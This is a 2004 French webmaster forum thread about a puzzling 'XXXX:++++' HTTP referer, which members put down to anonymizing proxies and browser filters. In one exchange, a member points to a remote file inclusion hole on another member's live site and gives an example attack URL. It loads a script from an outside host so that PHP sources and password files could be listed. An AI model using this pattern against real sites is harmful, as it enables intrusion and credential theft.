provenance XXXX:++++++++++++++++

sietjp · 25 Janvier 2004

Bonjour,
Depuis une semaine , j'ai vu arriver 2 fois sur la page d'acceuil de mon site un internaute dont l'http referer est "XXXX:++++++++++++++++" au lieu de l'habituel http ://www . site . com/sdfjkl

j'ai bien fait ma recherche dans webrankinfo comme un bon petit gars qui commence à comprendre comment ça se passe mais je n'ai pas trouvé, peut être avez vous déjà vu ça?

fredsoft · 25 Janvier 2004

on puex écrire facilement referer en php....

DAVID86 · 25 Janvier 2004

un ptit jeune qui voulait jouer au "hacker" certainement

fredsoft · 25 Janvier 2004

ou un bots developpé a la carte

parce que te hacker pas spécialement dur :

http://www.observatoire-environnement.o ... l=toto.htm

avec cette faille on peux lister tes sources php et autre fichiers de passwords

DAVID86 · 25 Janvier 2004

le fichier de password? comment veux tu faire ça??

Et même éditer les sources.... la, tu m'impressionnes 8O

fredsoft · 25 Janvier 2004

ton script permet d'envoyer du code a distance en faisant un truc du genre index.php?url=http://hackme.free.fr/toto.php par exemple

suiffit que toto.php renvoie ce qu'il faut pour lister les sources..donc les fichiers de password

Eservice · 25 Janvier 2004

sietjp a dit:
peut être avez vous déjà vu ça?

Bonjour,

oui certains internautes utilisent un filtre Web qui mouline tout ce qui entre et sort de leur navigateur (variable HTTP, javascript, cookies).

Dans ce cas c'est le referer qui est remplacé par n'importe quoi. Ca ne sert à rien à part gêner le suivi d'audience des webmestres. C'est de la paranoïa pure et simple.

DAVID86 · 25 Janvier 2004

fredsoft a dit:
ton script permet d'envoyer du code a distance en faisant un truc du genre index.php?url=http://hackme.free.fr/toto.php par exemple

suiffit que toto.php renvoie ce qu'il faut pour lister les sources..donc les fichiers de password

non car les chaines de caractères sont validées, et même en essayant des commandes simples, ça bloque . je connaissais cette combine. Mais peut être en as tu une de spéciale?

fredsoft · 25 Janvier 2004

je pense pas que tu connaisses la combine sinon tu aurais fait la parade gloable la plus simple pour ce genre de faille le test file_exists. J'ai pas testé plus sinon..donc je n'affirme rien...juste qu'il y une possibilité

DAVID86 · 25 Janvier 2004

Mitirapa · 25 Janvier 2004

oui provenance XXXX:++++++++++++++++ c'est les logiciels de surf anonymes ou les passerelles sur le web pour surfer anonymes...

yannouk · 25 Janvier 2004

david j'ai un peu trainé dans le monde du hacking si tu as besoin d'aide pour boucher la faille n'hesite pas.